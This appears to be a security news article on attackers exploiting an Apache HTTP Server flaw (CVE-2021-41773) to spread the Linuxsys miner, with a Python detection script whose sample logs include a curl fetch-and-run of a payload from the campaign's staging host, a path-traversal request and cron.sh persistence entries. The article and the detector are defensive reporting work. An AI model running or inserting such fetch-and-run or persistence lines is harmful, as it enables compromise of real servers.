Apache HTTP Server Vulnerability: Hackers Deploy Linuxsys Crypto Miner


New Cybersecurity Threat: Exploitation of Apache HTTP Server Vulnerability to Distribute Cryptocurrency Miner

Discovery of a New Malware Campaign

Cybersecurity experts have identified a recent campaign that takes advantage of a known vulnerability in the Apache HTTP Server to deploy a cryptocurrency miner named Linuxsys. The campaign exploits CVE-2021-41773, which carries a CVSS score of 7.5 (high severity) and can lead to remote code execution on affected systems.

Attack Methodology

According to a report from VulnCheck shared with The Hacker News, attackers are utilizing compromised legitimate websites to spread malware, which facilitates stealthy delivery and minimizes the chances of detection. The infection process, traced back to an Indonesian IP address, involves fetching a secondary payload from a site named “repositorylinux.org” using tools like curl or wget.

This secondary payload consists of a shell script that downloads the Linuxsys cryptocurrency miner from multiple legitimate websites, indicating that the attackers have successfully breached third-party infrastructures to aid in malware distribution.

Evasion Tactics

VulnCheck highlighted that this method is particularly effective because victims connect to trusted hosts with valid SSL certificates, making it harder for security systems to detect the malicious activity. Furthermore, the compromised sites host an additional shell script named “cron.sh,” which ensures that the miner starts automatically whenever the system reboots. The cybersecurity firm also discovered two Windows executables on these hacked sites, suggesting that the attackers may also target Windows operating systems.
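The infection chain described in the two sections above (a secondary payload fetched from repositorylinux.org with curl or wget, then a cron.sh script that restarts the miner after reboot) lends itself to a simple host-side triage. The script below is an added example, not code from the article or from VulnCheck. The log formats, timestamps, IP addresses and file paths are constructed; the staging host and script name are the ones the report gives; the encoded dot-segment check reflects the public description of CVE-2021-41773 as a path-normalisation bypass in Apache, which the article itself does not detail.

```python
"""Triage helper for the Linuxsys campaign indicators described above.

Three sources are checked:
  1. Apache access-log lines whose request path contains a percent-encoded
     dot segment (".%2e/" or "%2e%2e/"), the normalisation bypass behind
     CVE-2021-41773.
  2. Process or shell-history lines showing curl/wget fetching from the
     staging host named in the report (repositorylinux.org).
  3. Crontab entries that launch the persistence script cron.sh.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List

STAGING_HOST = "repositorylinux.org"   # named in the VulnCheck report
PERSISTENCE_SCRIPT = "cron.sh"         # named in the VulnCheck report

# Apache combined log format: client ident user [time] "METHOD path proto" status ...
ACCESS_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Two consecutive dots where at least the second is percent-encoded, closing a segment.
ENCODED_DOT_SEGMENT_RE = re.compile(r'(?:\.|%2e)%2e(?:/|$)', re.IGNORECASE)
# curl or wget anywhere on the line, followed later by the staging host name.
FETCH_RE = re.compile(r'\b(?:curl|wget)\b.*?' + re.escape(STAGING_HOST), re.IGNORECASE)
# A non-comment crontab entry (@reboot-style or five schedule fields) that runs cron.sh.
CRON_RE = re.compile(r'^\s*(?!#)(?:@\w+|(?:\S+\s+){5}).*' + re.escape(PERSISTENCE_SCRIPT))


@dataclass(frozen=True)
class Finding:
    source: str      # which input the line came from
    indicator: str   # short label for the matched indicator
    line: str        # the offending line, verbatim


def scan_access_log(lines: Iterable[str]) -> List[Finding]:
    """Flag parseable access-log lines with an encoded dot segment in the path."""
    out = []
    for line in lines:
        m = ACCESS_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        if ENCODED_DOT_SEGMENT_RE.search(m.group("path")):
            out.append(Finding("access_log", "encoded-dot-segment", line))
    return out


def scan_process_log(lines: Iterable[str]) -> List[Finding]:
    """Flag process/shell-history lines where curl or wget reaches the staging host."""
    return [Finding("process_log", "fetch-from-staging-host", l)
            for l in lines if FETCH_RE.search(l)]


def scan_crontab(lines: Iterable[str]) -> List[Finding]:
    """Flag crontab entries that execute the persistence script."""
    return [Finding("crontab", "persistence-script", l)
            for l in lines if CRON_RE.search(l)]


def triage(access_log: str, process_log: str, crontab: str) -> List[Finding]:
    """Run all three scans over raw text and return findings in source order."""
    return (scan_access_log(access_log.splitlines())
            + scan_process_log(process_log.splitlines())
            + scan_crontab(crontab.splitlines()))


# Constructed sample inputs (not taken from the report); only the hostname and
# script name are real indicators from the article.
SAMPLE_ACCESS_LOG = """\
192.0.2.10 - - [16/Jul/2025:10:01:02 +0000] "GET /.%2e/.%2e/app HTTP/1.1" 200 512 "-" "curl/7.68.0"
198.51.100.4 - - [16/Jul/2025:10:01:05 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
198.51.100.4 - - [16/Jul/2025:10:01:06 +0000] "GET /docs/v2.e/readme HTTP/1.1" 200 77 "-" "Mozilla/5.0"
"""
SAMPLE_PROCESS_LOG = """\
2025-07-16T10:01:03Z uid=33 comm=curl cmdline="curl -s http://repositorylinux.org/payload.sh -o /tmp/payload.sh"
2025-07-16T10:01:04Z uid=33 comm=sh cmdline="sh /tmp/payload.sh"
2025-07-16T10:05:00Z uid=1000 comm=wget cmdline="wget https://example.com/package.tar.gz"
"""
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
@reboot /var/tmp/cron.sh
*/10 * * * * sh /dev/shm/cron.sh >/dev/null 2>&1
"""

if __name__ == "__main__":
    for f in triage(SAMPLE_ACCESS_LOG, SAMPLE_PROCESS_LOG, SAMPLE_CRONTAB):
        print(f"[{f.source}] {f.indicator}: {f.line}")
```

On the sample inputs the script reports four findings: one encoded dot segment in the access log, one curl fetch from the staging host, and two crontab entries running cron.sh. The access-log check deliberately ignores lines it cannot parse rather than pattern-matching raw text, so that the encoded-dot signature is only applied to the request path and not to referrers or user agents.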

Historical Context of the Attacks

Notably, the Linuxsys miner has previously been delivered by exploiting a critical vulnerability in OSGeo GeoServer GeoTools, demonstrating a pattern of targeting various vulnerabilities over time. The shell script associated with this campaign contains comments written in Sundanese, indicating a potential link to Indonesian attackers. This particular script has been observed in the wild since December 2021.

Other Vulnerabilities in Use

In recent years, several other vulnerabilities have been exploited to deliver the Linuxsys miner, including:

  • CVE-2023-22527: A template injection flaw in Atlassian Confluence.
  • CVE-2023-34960: A command injection vulnerability in the Chamilo Learning Management System.
  • CVE-2023-38646: A command injection issue in Metabase.
  • CVE-2024-0012 and CVE-2024-9474: Authentication bypass and privilege escalation vulnerabilities in Palo Alto Networks firewalls.

These findings suggest that the attackers are engaged in a long-term strategy, employing consistent techniques such as exploiting known vulnerabilities, staging content on compromised hosts, and mining cryptocurrency on infected machines.

Targeting Strategies and Evasion Techniques

The attackers appear to be strategically selective: they avoid low-interaction honeypots, so only high-interaction honeypots observe their activity. This, combined with the use of compromised hosts for malware distribution, has significantly reduced the likelihood of detection.

GhostContainer Backdoor Targeting Exchange Servers

In a related development, Kaspersky has revealed a campaign targeting government entities in Asia, utilizing a security flaw in Microsoft Exchange Server to deploy a custom backdoor known as GhostContainer. This backdoor is believed to exploit a now-patched remote code execution vulnerability in Exchange Server.

The GhostContainer backdoor is described as sophisticated and multi-functional, allowing attackers to extend its capabilities by downloading additional modules. It grants full control over the Exchange server, enabling a wide range of malicious activities, including executing shell commands and downloading files.

The attackers behind GhostContainer are suspected to be highly skilled, given their deep understanding of Microsoft Exchange Server and their ability to convert publicly available code into advanced espionage tools. Notably, the backdoor does not connect to any command-and-control infrastructure; instead, the attackers issue commands through normal Exchange web requests, further complicating detection efforts.

In summary, the evolving landscape of cybersecurity threats underscores the importance of vigilance and proactive measures to safeguard systems against sophisticated attacks.
